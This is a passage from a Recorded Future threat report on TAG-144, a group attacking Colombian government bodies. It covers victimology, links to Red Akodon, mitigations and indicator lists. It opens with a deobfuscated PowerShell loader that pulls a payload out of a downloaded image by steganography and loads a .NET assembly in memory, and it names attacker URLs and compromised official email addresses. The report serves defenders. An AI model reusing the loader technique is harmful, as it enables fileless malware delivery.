0x00, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3C,\r\n0x6E, 0x37, 0x00, 0xC4, 0x0E, 0x00, 0x00, 0xC4, 0x0E, 0x00, 0x00, 0x00, 0x00,\r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\r\n$energises 
= -1;\r\n \r\nfor ($scattered = 0; $scattered -le $sorority.Length - $backpack.Length; $scattered++) {\r\n    $lipogenys = $true;\r\n \r\n    for ($Phalanx = 0; $Phalanx -lt $backpack.Length; $Phalanx++) {\r\n        if ($sorority[$scattered + $Phalanx] -ne $backpack[$Phalanx]) {\r\n            $lipogenys = $Brunhild;\r\n            break;\r\n        }\r\n    }\r\n \r\n    if ($lipogenys) {\r\n        $energises = $scattered;\r\n        break;\r\n    }\r\n}\r\n \r\nif ($energises -eq -1) { return }\r\n \r\n$splenoncus = $sorority[$energises..($sorority.Length - 1)];\r\n$varicelliform = New-Object IO.MemoryStream;\r\n$varicelliform.Write($splenoncus, 0, $splenoncus.Length);\r\n$varicelliform.Seek(0, 'Begin') | Out-Null;\r\n \r\n$Hippocrene = [Drawing.Bitmap]::FromStream($varicelliform);\r\n$Coreopsis = New-Object Collections.Generic.List[Byte];\r\n \r\nfor ($reusably = 0; $reusably -lt $Hippocrene.Height; $reusably++) {\r\n    for ($digoxin = 0; $digoxin -lt $Hippocrene.Width; $digoxin++) {\r\n        $cradlelike = $Hippocrene.GetPixel($digoxin, $reusably);\r\n        $Coreopsis.Add($cradlelike.R);\r\n        $Coreopsis.Add($cradlelike.G);\r\n        $Coreopsis.Add($cradlelike.B);\r\n    }\r\n}\r\n \r\n$bolsterers = [BitConverter]::ToInt32($Coreopsis.GetRange(0, 4).ToArray(), 0);\r\n$scoundreldom = $Coreopsis.GetRange(4, $bolsterers).ToArray();\r\n$flamers = [Convert]::ToBase64String($scoundreldom).Replace('A','@').Replace('@','A');\r\n$supinely = '==AMv4ET5l1aC1EVvQ2LlVmLlR3chB3LvoDc0RHa'.Replace('}|','t');\r\n$amaurotic = [Convert]::FromBase64String($flamers);\r\n$sycee = [Reflection.Assembly]::Load($amaurotic);\r\n \r\n$astatizer = @($supinely,'','','','MSBuild','','','','','C:\\Users\\Public\\Downloads','creels','js','','','backticks','2','');\r\n$sycee.GetType($arboricultural).GetMethod($automaticities).Invoke($snarl,$astatizer);\r\n \r\n$Hippocrene.Dispose();\r\n$varicelliform.Dispose();\r\nFigure 14: Deobfuscated string (Source: 
Recorded Future)\r\n \r\nThe PowerShell script retrieves a JPG image from hxxps://archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg. It then employs steganographic techniques: it scans the downloaded bytes for a specific byte marker (a bitmap file header), loads the bitmap found at that offset, and reads its pixel data, where the first four bytes give the length of the embedded payload that follows. The extracted content is a .NET assembly that the script loads directly into memory. Execution is carried out by invoking the VAI method within the ClassLibrary1.Home class, allowing the payload to run without ever being written to disk.\r\n \r\nNotably, the same archive[.]org URL was observed in connection with XWorm samples associated with the domains deadpoolstart[.]lovestoblog[.]com and deadpoolstart2064[.]duckdns[.]org, which also featured similarly named files, including (1, 2):\r\n \r\n● NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_E.js (SHA256: aee42a6d8d22a421fd445695d8b8c8b3311fa0dc0476461ea649a08236587edd)\r\n● NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_E.rar (SHA256: 0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1)\r\nVictimology\r\nOverall, Insikt Group identified a significant number of TAG-144 victims, all of which, where attribution was possible, were Colombian entities. Notably, as evidenced by victims associated with Clusters 1 and 2, the majority were directly tied to Colombian government institutions (see Figure 15). 
Beyond these, additional victims were identified across the healthcare, retail, transportation, defense, and oil sectors. Importantly, several of these non-governmental entities maintain some degree of affiliation with the state.\r\n \r\nFigure 15: Breakdown of TAG-144 victims observed between May 2024 and July 2025 (Source: Recorded Future)\r\n \r\nAlthough TAG-144 has targeted other sectors and has occasionally been linked to intrusions in additional South American countries such as Ecuador, as well as Spanish-speaking victims in the US, its primary focus has consistently remained on Colombia, particularly on government entities. This persistent targeting raises questions about the threat group’s true motivations, such as whether it operates solely as a financially driven threat actor leveraging established tools, techniques, and monetization strategies, or whether elements of state-sponsored espionage are also at play.\r\nOverlap with Red Akodon\r\nIn May 2024, SCILabs reported on a threat actor it named Red Akodon, which closely resembled Blind Eagle in terms of TTPs. The threat actor primarily targeted Colombian government entities using RATs such as REMCOS RAT, QuasarRAT, AsyncRAT, and XWorm. The attacks were delivered via phishing emails posing as legal notices or judicial summonses, allegedly sent by Colombian institutions like the Fiscalía General de la Nación and the Juzgado 06 Civil del Circuito de Bogotá. Despite the similarities, SCILabs chose to track Red Akodon as a distinct threat actor at the time of writing.\r\nAmong others, the report identified four GitHub repository usernames: “jairpicc”, “santiagonasar”, “colombo08125”, and “mastermr02456”. 
Of note, jairpicc also appeared in association with a Pastebin account observed on August 23, 2024 (see Figure 16).\r\n \r\nFigure 16: Pastebin account linked to jairpicc (Source: Recorded Future)\r\nThe Pastebin account was associated with multiple Pastebin links, at least two of which returned Bitbucket URLs hosting AsyncRAT payloads. These AsyncRAT payloads communicated with domains such as enviasept[.]duckdns[.]org, enviosep04[.]duckdns[.]org, sost2024ene[.]duckdns[.]org, and trabajo25[.]duckdns[.]org, all linked to TAG-144. Additionally, Insikt Group noted that the payloads hosted on these Bitbucket URLs followed file naming conventions consistent with those observed in TAG-144 infrastructure. For instance, one Pastebin link returned the URL hxxps://bitbucket[.]org/descargggt/servdifr/downloads/remcoss[.]txt, with the filename remcoss.txt matching file names found in open directories previously reported in association with TAG-144. Additional Bitbucket URLs hosting files with matching filenames that lead to AsyncRAT infections are provided in Appendix A.\r\nRed Akodon also appears to have used at least two likely compromised email addresses associated with Colombian government entities: nomina[@]magdalena[.]gov[.]co and npereza[@]cendoj[.]ramajudicial[.]gov[.]co. Notably, on October 31, 2024, the Colombian cybersecurity blog ¡Mucho Hacker! reported on related activity involving similar abuse. This report highlighted the use of legitimate government-linked email addresses, including abogados[@]hujmb[.]gov[.]co and j03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co. 
The blog speculated that the threat actor either had access to internal systems, allowing them to create legitimate-looking email accounts, or possessed an undisclosed capability to spoof official addresses.\r\nInsikt Group confirmed that the email address j03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co is legitimate and seems to belong to the Juzgado 003 Penal Municipal con Funciones Mixtas de Chiquinquirá. Furthermore, the address was found in malware logs associated with the Stealc infostealer, suggesting compromise. The email appears to be linked to a Colombian public official serving as Secretary of the Second Civil Circuit Court in Chiquinquirá.\r\nThe malware logs also contain email addresses believed to be leveraged for phishing purposes, including:\r\n● ftorreshe[@]cendoj[.]ramajudicial[.]gov[.]co\r\n● j01pmpalchiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\n● j02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\n● jcmpalchoconta[@]cendoj[.]ramajudicial[.]gov[.]co\r\n● raccionestutj02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\n● repchiquinquiraboy[@]cendoj[.]ramajudicial[.]gov[.]co\r\n● silay.salamanca699[@]educacionbogota[.]edu[.]co\r\n \r\nInsikt Group assesses that TAG-144 considers the use of compromised government email accounts to deliver spearphishing emails a standard part of its toolkit and is likely to continue employing this tactic.\r\nMitigations\r\n● Recorded Future Threat Intelligence: Recorded Future customers can proactively mitigate threats by operationalizing data from the Intelligence Cloud. Leverage continuously updated Risk Lists to blocklist IP addresses associated with TAG-144, thereby preventing internal communication with known malicious infrastructure.\r\n● Recorded Future Detections: Recorded Future provides Sigma, YARA, and Snort rules that can be integrated into your SIEM or endpoint detection and response (EDR) tools. 
These rules detect the presence or execution of malware families linked to TAG-144 and similar threats.\r\n● Recorded Future Network Intelligence: Recorded Future’s Malicious Traffic Analysis (MTA) events help identify servers engaged in exfiltration activity with known malicious infrastructure. These insights are powered by proprietary methodologies. Use general MTA event queries for broad monitoring, or targeted queries to focus specifically on malware families associated with TAG-144.\r\n● Recorded Future Monitoring: Use Recorded Future to detect, flag, and block inbound and outbound traffic involving email addresses or domains that show signs of compromise, such as those appearing in data leaks, malware logs, or underground forums.\r\n● Monitoring for Potential Network Device-Based Threat Activity: Monitor traffic from the IP addresses listed in Appendix A, which are associated with potentially compromised devices, including MikroTik routers, and which have been observed communicating with known TAG-144 C2 infrastructure.\r\n● LIS Flagging and Blocking: Consider blocking the use of specific LIS on your corporate network if not required for legitimate purposes. Network defenders must strike a balance between mitigating malicious communication via LIS and excessively restricting access to services that are allowed or necessary on their network. Previous Insikt Group reports, such as “Threat Actors Leverage Internet Services to Enhance Data Theft and Weaken Security Defenses,” as well as this report on TAG-144, can help inform those decisions.\r\n● Email Traffic Filtering: Implement a robust email filtering system to detect and flag messages containing malicious attachments or links. 
Ensure that suspicious emails are quarantined for detailed inspection, reducing the risk of phishing attacks and credential compromise.\r\nOutlook\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144, active at various points throughout 2024 and 2025. These clusters have primarily targeted Colombian government entities at the local, municipal, and federal levels, while also affecting private sector and non-governmental organizations. Although they share common TTPs such as the use of open-source or cracked RATs, dynamic domain providers, and LIS for staging, each cluster demonstrates distinct infrastructure, malware deployment methods, and operational approaches. TAG-144 has also been linked to Red Akodon and has been observed using compromised Colombian government email accounts in spearphishing campaigns.\r\n \r\nTAG-144 is part of a growing cybercriminal ecosystem in South America, where rapid digitalization and limited cyber defenses have contributed to more cybercrime. Looking ahead, Insikt Group assesses that TAG-144 will likely continue to focus on Colombian government targets, while maintaining its current operational patterns. This includes continued use of compromised email addresses, dynamic DNS services, abuse of LIS, and deployment of customized tools such as the previously observed BlotchyQuasar variant of QuasarRAT. TAG-144 is also expected to adapt by integrating new cracked or open-source tools and identifying additional LIS platforms to exploit. Furthermore, the threat group is likely to deepen its involvement in the broader cybercriminal ecosystem through collaboration with tool developers and affiliated threat actors. 
Given its persistent targeting, technical adaptability, and operational success, Insikt Group assesses that TAG-144 will remain a significant threat to its typical victim profile for the foreseeable future.\r\n \r\nAppendix A: Cluster 1 IP Addresses\r\nIP Address | ASN | Type | Malware Families\r\n45[.]133[.]180[.]26 | AS9009 | TorGuard VPN server | AsyncRAT\r\n45[.]133[.]180[.]154 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]137[.]18 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]137[.]90 | AS9009 | TorGuard VPN server | DcRAT, AsyncRAT, REMCOS RAT\r\n146[.]70[.]50[.]42 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]51[.]42 | AS9009 | TorGuard VPN server | DcRAT\r\n146[.]70[.]57[.]58 | AS9009 | TorGuard VPN server | AsyncRAT\r\n146[.]70[.]83[.]218 | AS9009 | TorGuard VPN server | AsyncRAT\r\n181[.]235[.]4[.]255 | AS3816 | Colombian ISP | REMCOS\r\n193[.]56[.]253[.]66 | AS9009 | TorGuard VPN server | REMCOS\r\n93[.]115[.]35[.]146 | AS9009 | TorGuard VPN server | DcRAT\r\n \r\nAppendix B: Indicators of Compromise (IoCs)\r\nCluster 1 IP Addresses:\r\n \r\nCluster 1 
Domains:\r\n \r\nCluster 2 IP Addresses:\r\n \r\nCluster 2 Domains:\r\n \r\nCluster 2 “deadpoolstart”-Themed Domains:\r\n \r\nCluster 3 IP Addresses:\r\n \r\nCluster 3 Domains:\r\n \r\nCluster 4 IP Addresses:\r\n \r\nCluster 4 Domains:\r\n \r\nCluster 5 IP Addresses:\r\n \r\nCluster 5 Domains:\r\n \r\nURLs:\r\n \r\nSHA256 Hashes:\r\n
6622eb87cffba645987b1f81161905452aef175a\r\n33fddd6a9d4bece9be47be6d623da228e4cb69f5c51aaf61ffb75c803957396d\r\n359eac88704e65913b7331affecd4ca911b52f000e68599f24af96d6ad71b82f\r\n370e7db7155cd9b03875431462ffc8223dcc4bf7c1dcb5a07420e84bc6316d93\r\n38019ee88bba4b4ceb159643c5a2a2608b628ef673e7ab7516ef47f6f6230618\r\n3a625c677ba81aa0639129c07cf7991e39be78e9e1b23bb31005e75c19de8580\r\n3c2940ad16f414f884e8c6f90c1f36a313f9982152b9aa8d355282ee7bc81a9b\r\n3ce0428f9fe958fb6cecbf7bfe8cdb719550a1a3a5b2303686c696bc21c82f78\r\n40714eff62e3c9f7b7588a56cbcaa115a800c6b336de2a82f87d2544ab2daf69\r\n44284652527348f428112ea6eb564103d72edd650e3d0c831ad91043c99d5ffc\r\n4442b45bc6cca253a7a53a1b2a872df3867b898403ef0d2c3a8cf5687f615aed\r\n44ea4a98e1ac0e0d4c7063992f562cc893b8ff4da7fe72868b3fe487c061dbb0\r\n45185844b576c28810d12c849fde05cd6bd23900ca97394f81a98b7872490ad0\r\n4564bdb245c4e6248d78aaea7b588ad3faa79514e7662b80525578dc615e07b5\r\n4776dd03944a13cd756ab7fb4ac979fab7eb6ff92f5f23e4138a06a2aeec9581\r\n4790e32d8b33b9cf719d84a83eaf2a5d953d0a9dc22843276ee343d60f1b7565\r\n47a2313df0d0a74c1be649d04236dd10b48693a5da0db30335d77371f4ae7fac\r\n49ccc8aa8b6e505207743cc172193f948aaa236304018da0bf0d2ccfd8c0e985\r\n4a812c47b5b4d7b2e383cde74fa61bb49685f0820c88d570ff6a921e631b5926\r\n4becc5d800d9851cc25fd09c848e834d019c2f57ec7bbb513d03eac6e4344287\r\n4e1597543c0d63cf44db982f9c5cdb0ebdb88343ab8e8711501103d5f2ebb06b\r\n4ef47b3e56af3742a6f8389f126ed14a2114ff2e8dbf7118511cf62cd0d8bd79\r\n4f6d6abe27b5e7e9aa55ada51b521e8fe715c6c0bf4bd2e2838c9c85f543f719\r\n4f6fdc5d3b90b760670a2545ed96e8eed348ce2c0fae37058fd7318df17cba07\r\n4fc1890df01994a7163f1605c8cb2a660531cb9e6cf3d05622d97791df337aa3\r\n508176ecdbf35360d23083f25c762493a2ebbca1d4cebcd5953b00d1e1be0741\r\n50bde48b7037890d318cf123e23a78f734634cff29354fc5852293d5702737b9\r\n52ad9c51a0d0ac35f7934e85770ed32de61f214b7551fd5310f1a342e154309b\r\n53e52d8dd95c09616022e09d7b94901e2f5189c258438cc910ab19760bf36da3\r\n56e66a73d0ec0ef032b8fc157ef65f38d97476066b4a5cab88ad
036fc25e8634\r\n593a1b142fc855ad10cbc84e107d3a2cd248e88749658af8f6f656095f6f883a\r\n \r\n35  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n5b8aa9408ee3d18a803df688974bfc125b110db19349e1938ac8d3bb6a966fcc\r\n5bfedb358b5ebe7db6793dfb87885fd08d547cdea786659654bc717c98825a00\r\n5c51dc904076cd5dc22fec10fa18563ef5283ebcfeec6f4bdc23a7504f1d5838\r\n5d75ad8822f8149ddc84f1148ac011b9c39a7979a611bfe2bc8c2090e4d54728\r\n5e07c2f16fe5b2d60c4daba73c31f298b2fba618d329e57ba806c19a7663cfda\r\n6073590a4b09dcd26e35a6c831691e537736a292a7cc5bd668b07dbbf1000415\r\n60ff5136bfcef60a83320eef711bce7f41a0447f95568d09e908a49f351344da\r\n6140a9a1ffaf120d6f33097c1f8bfdcac83db5d883451a073f0cf2524fb1996d\r\n61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa\r\n627d051af3b66b3ba4337c688250f2621abc9f3b4cf1434e10654ada10887881\r\n62c0672bd77beaab3e5546944e23f7db1f66a207d9eecbedcaaebb4bfc47b954\r\n636acb2498b3cc5a455badd95e1839edbd84d46b18af80e1f5c4efe6cf573c3c\r\n64a4287f7973fdb7a9030679dda5b1d175d34c568910282dd532dffc45af6e9c\r\n657e021f0dfdd8c628a428a824da278d14d674aefd248f86a58f5bbe4472f0dc\r\n666f8ba7a9704f98ae74481fab1ce77c3256bad31d22206c5cdf9cb1009c4b2e\r\n6849da9fb64c3db1e883aa1a106a03c8e69d3e41d4be8a81bafbdd78f2f311da\r\n690c8ee15e2bae3050b1ba813e4b7fbd8ee93d9b7132745aec345372322d69fc\r\n6cac0e0c1836de13434a251e8c792b459ba4e573023be0472898a26fdeef3f20\r\n6cae1f2c96d112062e571dc8b6152d742ba9358992114703c14b5fc37835f896\r\n6d41b3409dbdabdc5109f72b190e2a54ed82b2cbb15951ac077343b2b0e81241\r\n6d4a557b0c436b278bf484d9aed2daffa66c105c9056e6156216a6f224c086c2\r\n6d540d76f627bc97929b77e2f613ff641be0810332505b010164f38940d0120b\r\n6dc49027dcfc978c4533c46bc9b37a39c7038a347ae5bb5535439517b2075bfc\r\n6df21a64f5b80d9e214a721e2025510fcd29ca191f8ff39386e07b15e06afd95\r\n6e7d32278271b077912779e2ef7f5aac3246578393ad93024c2211a86380b208\r\n702e912dac9885a2a74094d14b5c312d979aa86412f5fe6b612ea2bc0445a572\r\n705ea94689cc1507c6ee13bc2e8d54bde154a4a98
80e2c1049f4036b9671631a\r\n708924eabf4e730a1eaa5e2db2ab6d483458370763efebdd31d25fc95c04945a\r\n71153a5e57cf77267bfef881faaf3575068c79fee2cd9165252d5e885bc9e5a3\r\n73c28224eca789607d77884620425d0fad56ef7591d6cda5f384a49d19beb5c7\r\n75001105ab3d7363f619f77a3a4a8a62422f9b28ae299a06c34b9bc474610e7f\r\n7652a17de2e02c57fd7a20cb690fec60e63f4223e6d990375737e93579e92957\r\n77128fae0b6acdbc56ece8ba39015d42fc561794d8ecd1cbba8d9c423ad99439\r\n7748317f687fe8cb70e0d48d528223d8737b462235837e6beefab6f28e553ffb\r\n78f4cd376fa2eb034e90790c5f963d0439251e2425c86ae64fc43e4e2509d75a\r\n7909978dc2c58e00379f31c8fd34f15b56ec714c3cf0a5804c7b164d15cbeaf3\r\n79512c2ddc11fb9d9f95f7e6fbacbb91db53362ce6799cf89d870683e63f4605\r\n7a635c5189632764d900111b53fb26f88e2c7bac46bd5c38ad51ac7fe962ab48\r\n7b9da4885838c16faf069a1b0f29ce6560ca8c65ad60f70f8c8f77ab2f2df4fa\r\n7c02f8bc0d327a8f061be14476004aa13e78bb348dbbb9e1eb1a255e9edd3f8e\r\n7cb8124af5c9942809588851783438f25b4a79224c63c0d3a2568a662706334f\r\n7cfe415ee93c8a321d7f90315ca3f70629fda89c6e4acbde87ee1abd65cdb25e\r\n7dd67fdd9eba6f4093979ee73f01e9c29231530ea73acc90948fcffce17f8d5d\r\n7e0f17ee075fa068cf0ff0751d7e1f9c2512628f20248cfe93f742fc1d3d60aa\r\n7eaaf8ac1097ba3bcaf0f9cd166e5ed10e6ae16d04a78ff227bb6c584316f01e\r\n7f206ec690f881a7939406e51f1df454bb55a0fa6cd8c0892b05dd7249ab3db8\r\n7f4949366003ad5c97543d39a3457d91922c489dd929038a764fe6cc5c410604\r\n8069dc3a01b238d5506448abd7cddb3a7c583b81b209e516481b2923aac90782\r\n80a8c38c435b42fb1a5b77d85da369ca40b7d4206cc936f04732c4eb3527ae07\r\n80ba2478e4695de6db6ee1bed092eab38cc6c4243f3ba6e6a16ca180a68520ed\r\n80fe3676d482c19e5909ca6d4dc014f2f46504dd7c0b48fad5a56d0060958abb\r\n82556970b87adf24162bdea13611a0206e2d2d6ec1020da29317bfe5c7b51de9\r\n82b733a36bbbfb27d602e728314398c6db1b5ce3d37aa584c50cdf625fd949bb\r\n842b97229574ce1ca55415fd20a80dc29f1b35b8776a8d482bb5997b53b6f26f\r\n84ec8e3181e19f5c492ed3c43cf69e74ca7ef109b535b7b82143ba9b2d59442f\r\n84f4733b7eaeea866b3f35e932f25713f621817c79f0096c9da22a3973430286\r\n8
5cc9928363eb10ed90785a217d5f51e37a22efa4a7f30bdb8bc82ab2fa1267e\r\n86bad37b00f1e0b3c38bed9a6f6995fa332761a1bb1e826a0708ab80ddfe6a8b\r\n88490dc46e9e631c09526cdfd0ffdc6ae7be26bb35e58903ca52973e7d0e34cf\r\n8944005cc7ce00627022ebff406c65e780bb87fd56a2bed8db91585867a50346\r\n \r\n36  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n899ce743d330882aa2f28d6a6ed6c3def3e409d8b20149b0161716e104fdd7ea\r\n89cbc0a596623b035e90dd76cdd27aca583edda8d64e7174b2a4fcd6829b42fb\r\n8a7bd4d6832c72f8fdfeb1eb7cf8c89107c9ec617b875a62e659f12da2acc3d1\r\n8aa26ab75ad89a6eebadb7f1da170f62ff81abcfe44afb5fca2ae1d2dc0b9e1a\r\n8b0a8fb7c648e80397067ecd714092d9904c6d8625f67aa1aef2dc864891ab43\r\n8f61b17b3528fc2e4a5d7fa647b7aa86e7653f98a90fa5e2e08b0ed51e69de3a\r\n8f7245f0797164e14902ede0ccb4055452b3fd293559d5e652724d33ac2f381b\r\n8f972b2fba44198800333d8f7d9b9b1daac3c0d4693481ca8ac8f6cab4af989f\r\n904f1f112a522dba3be4fc8412cb240003f8c5772014ad7233092bbd8e4e268c\r\n91c63ebd9c9753eebb6059358e004e9aff0c8bc590a81c8904b2aec5d08a7fa9\r\n9305f79e4ebf3863c9503230744c03bdbe3e5fe65e8fb7e2f29ed6a5081d23b0\r\n9426b4682adaf3a2166a0c92b5b710e3351f102feafc26a0f3f11332ff6ee00e\r\n94d9c1e115024ef099bffddfd7780e1a8a593be41f613a464ee565936c121119\r\n94e3299936f3a8a903f08c04b0579ebede2cb3917e92e727142626c5391bdf3d\r\n95687da203507a11837eaeb29bfe86481828b74b62fc869604b5eaa552f950c2\r\n95b2b415d6b4347fd035db1eec5f979b377bbcf0171b153b1110021bbba6cac3\r\n95e5c56554c9f3a36401a084c7676ed156ab9aa1b9c6bae282b6772de9cc8df8\r\n96a31ddc63bb894c41f389a222e84a48cefa4c117e66e3ef166c36c8a0ae9f19\r\n9704c2c88a3ea50c430b3485dbb5f9374785333bf65a6577fde16fa3e0e4bf48\r\n9945a60ea4f2f1cfdae3ef85ccb74af2ee8b80d84889d3897f6c2a034cccf9c2\r\n999d6e7ce39ca8e9f85ab0f2e53db9e503a765a3c5515f6336c491f153a005d0\r\n9a42050380007f9982c8e59da42c6cba94b30ea12403691886bfc91c38fb92b6\r\n9ab94cafd45dc195625806c133c6a8d411669d69a50e5a9006c841be75539687\r\n9b1d205dc28f1471e09aaa67c3fd10327531e5e5d6590ddc216f03a41c
f9b92f\r\n9be19996b731955043513227171aa0a91ed825f1f5616f5a3b94dfeaa1651da7\r\n9c05646d2deb572ac87ad74897905ecaff050173ea2af8dcfd7acf1adea7772f\r\n9ccea0fcf8ba30f933dfcb6e697d46c8bcba0744250cb4420b41d3369e34a6a0\r\n9d3c887b526df1630a1e46bbcdd7148f5d5f2e8c964eec8aaa0b01b294b944d7\r\n9e8b12807c3d7a542cec5bf6a5781a2f6c300938313b1d1e129293a4202035ec\r\na0bce2bd548a9f33da2478ed6841c780d6f0f63fce0be90b89fa189e65762b65\r\na0dee795b9fe96554569c2854167647f630be4399f294dd2cbaf58bb8acb27d6\r\na25e799d14d882edc5754916885011c98d3f5a15ae0b66fbe83a183b0d9a18fb\r\na2b268ad1797615fc174bf71a3000bb48a34ba439289ad62d1734e86a9a638b5\r\na38beba261e6b75233fcf7d0f019644d985b80447d27d5a2d8939d75869121df\r\na3ca3c50a8693d0454d113b9ec34ddb6aab15a6fefea415596ea2535d2364936\r\na3e7b5ecc6ff323ac3e57197cd82aa0cc8ffa07abf3488a804e29c2725e696e0\r\na3fafd76cc487289ee5d259d046ebbaf82ffa71c13e69f3538aec0a7fca593df\r\na45dc0648f247eee9ae3ab15d1eece5907624a1a250feaff7e8ffcff8e04fa1a\r\na47039fa1a8aa88d170890d4c9a12aa356d9adbc845593cc1638c85ba120dc78\r\na5085f9c7304a762e274524b96dfc34f9ca243b479a2472c6e5e5b367f46114e\r\na52e245dd7937094711b10c479274a2cccea2dfb89f7d4c9f22879214718f92b\r\na61b40b09b2c8f714c7cf70a92a9b215cc53cc3962a543b1bef4fc3999a6f6cf\r\na85332e4145ab71582bbfc0f6cff9d24e0aeb2c45c8e69c6af860bf2255c86af\r\na97c3e3513946498242a032992ba05946787ba736facad8e51c192c3ad272713\r\naa7234653c35c44d1f952fc62808f3831f97637acfe1c4e0b1e12a8e291b5f4e\r\naa8b92535e690da968234d639af28caf881f03ad1f4dcad1c692b846830d0d87\r\naab18e256bd738597364a8a91f37b316abe540999ad13f60bfb506f3353d40db\r\naaf3dbfd566b4dc833c0de88435132f4185f589d37211386f799b95722e37a33\r\nab4a471521b43632e071e53f28e15e1b68de8c2b8971b62985e7251bf3382130\r\nab64e78fe74b47890929238bd6c60e55c3c2c0a7f84c76c170f2281417e5da17\r\nadd9a93c013732ec36a6554212d75b7969e46b6dadb55bf82c34d9a5e20a9d1d\r\nae9a36c85c11f5f71596bca8f3b01b49b0175be9d9b1367d09419715edda2b02\r\naee42a6d8d22a421fd445695d8b8c8b3311fa0dc0476461ea649a08236587edd\r\naf07986cfaa6184e28
88310a493104909ab9eee6f1512a74633331afbd32fee9\r\naf5c473f2f15835d745853d7127769d77f04611efbf792634f6d1f833bd150a2\r\naf891967c363f51bdd6cb33bf9d058f8b98337d1c387ac976e7c568ddb43b641\r\naf9ddb84ff76790fd8f596ff845784abd3464c74bb8b82836ce23189c4b7f183\r\nb08e83b034213d1c4d33e29c63d8d24b99684c2714e29ae3b3aaec34d5c8d134\r\nb219c4089fa80f02dd5ba6b280c0a3794af9cacf7460d090f23a56fb100d558c\r\nb231204b60e0b4e8b462af718964fa54d544a9658225c47e314e3daae0efc0b4\r\n \r\n37  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nb2bea3384dc24126675379eb1473946f2927a10d8eff6730bc024716ef0f6864\r\nb2fd262519105fb279e36476380f83068601609492f410d5e700d3a764e2ac36\r\nb315aa63ea29afe35dd51c2382d48bb6de5e1d9166368df00eb2d7750eb747f7\r\nb4491285f2084f070ff3f15c150568d920dcf327600c30b539063981dfcfeee4\r\nb49dfaa0d915524049eb0eed26115dac421cd307551284a054a27cbbdb9aad81\r\nb5739bfbada346770909e8287fe1e2ec45d662d9958355a4aa4f47423118b8e8\r\nb5a44cdcc65c728f7e447eff764905d6bfda4039992b470afe2cc84ce8dcc5f7\r\nb5a6c21c9fc7033418be5efb45746b181551e346ab255feca19fd0d40cbb0942\r\nb633f0a171dbd8b0e06cee74602f9863d4133566cfb56fabfb95e281ffbb6fdb\r\nb6bab712bb3a684b5c7b7e147e5d8ba293e4934ef443ccce3a8914b6d3e28df7\r\nb7688d7428dbcc35afbff30b349adf1a16667e3736c47a9f27a86decf9d1b37e\r\nb78a931beae08692b1368197832e4dcabbfea87f6c362258ea854d4e5658240d\r\nb7d205a1560b07a92d744053744c29823064e2c415a71887fccd8524a3cad3fb\r\nb821057045d27dd6ce8e14dac6e93d42c9ca47ce1e86390c5d2dac0401d28601\r\nb97420f542add6441b0fe7389aaf327a9bbf3cca5174280b6c64de264d2dbd7c\r\nb9a7fba5330cc0d97990178d1c492deddb1f287f21de30c40b0e4e2f47b2be21\r\nb9df7d55692a03d3255e824a37cd53de11c07e51864809ceca01362a56b991d5\r\nba604a46a71d45d0bb3ba3eea9f0faece3d48ba6ff2872778057ce8a0efc0d33\r\nbac96f81c8485c3bd6193bb3451f30feb0e972b780463beba41a9dc1121aa9c4\r\nbbbbc1e8c660d2d8b00d87446e52d3be20da3f4da7c3505e3468ad731eff250e\r\nbd34831c864eadb917c78ad850b9e40685f17dbb1927018ff9d3dbd1f6d57ce1\r\nbd7dcd2
e04ece48f19494ef3236127492cf332fdc7f8c4e9931b0a434bd4ffad\r\nbfe2d9f203a8890182df4737119ffbdb91527754bb06e7108415a45b47ad41ef\r\nc0cbee9a428f04a894b71255b869d00e0c2ab06dd1740bfe89338b8c65f8c46d\r\nc10317f74c6f011a71bbb4df80e7b6d4b950de436a2f49effc3e443c4f6920d2\r\nc12239a964eb2a9631f02489464a67d2c0837bb36e32a53cd6bc03301082d79e\r\nc3f5376c06e423482735d896285dd9bcbeee98874075cf47bec41e3448bd2f95\r\nc51e59b60975fd8e8cddac0827068da0c8a4c3928c6105917cdb28b95a7cc551\r\nc63ce128ee4c0442e303b86d27e3e7df8eff15a04a44ada8cabfa965144ccf56\r\nc671155c2ff3529435a4facaabd8a06c6f5e559ff24763d6f387bc818c453727\r\nc69461854c0d9bcf75261e78a94bc1a5f9b8daaf6ec536c7e83b528649f2eb5e\r\nc931b2128f9bdbf85d0914a97dbbe76bb3220d3a402143bd14d1bf32f820214b\r\nc9776da6cafb9537f84841d4e4b1ae8c3a26337c9fee45176881c1d114a63980\r\nc9a017f4180ec82ef8e0d2340d862bdc3d993725b8a3eff0ae15e9d2f00f4e69\r\ncb70a3999672fb0949fcee0898f84346140a79868b0b97503cdf4ce715b86564\r\ncceb4541dcaea1b067bef64943b47653d239ac07d6ee6f50d74832545035e350\r\nce2a7bafbd2a2700a7ba5962f13cf3f85be1f2b93e48d588a4471be122c8340d\r\nd12efa7c95087156cbfdeda07b3c68d7f2d9a31162d952c1dd2e25630e369416\r\nd15e2227283e9f87b19538f1ffe0de9fcf08efa30a9742d3ec7bfb9c7f595837\r\nd1de1db53d364adf0ff850b17ed5269dbf45518608807c554ee29052b4a8fefd\r\nd25df9c7ec360528cf3fd9a88ed04660ba8bec6b35ce2de04fa4d09a9d1666c7\r\n